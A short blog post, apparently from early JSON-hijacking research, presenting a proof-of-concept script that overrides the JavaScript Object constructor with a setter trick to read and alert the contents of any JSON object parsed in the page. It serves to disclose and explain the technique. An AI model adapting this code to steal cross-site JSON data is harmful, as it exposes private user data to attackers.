JSON is not as safe as people think it is, part 2
Yesterday, I blogged about how to steal data from JSON by overriding the Array constructor. Today, we break into Objects too.
Mark Goodwin submitted a non-deprecated syntax that uses the __defineSetter__ feature, which was a good start (Aside: does anyone else think that's ugly?). Over iChat he also invented a setTimeout tweak, and I ported it over to Object.
So now you can steal data from any JSON object:
<script type="text/javascript">
var obj;
function Object() {
obj = this;
// define a setter for the killme property
this.__defineSetter__('killme', function(x) {
for (key in obj) {
if (key != 'killme') {
alert('Data stolen from array: ' + key + '=' + obj[key]);
}
}
});
// call the setter when the JSON parse is done
setTimeout("obj['killme']=2;", 0);
}
</script>
<button onclick="({ 'data':'wibble' })">Hack</button>
It's still not going to work anywhere but Mozilla, but now that's only because the JavaScript interpreters in the other browsers are out of date.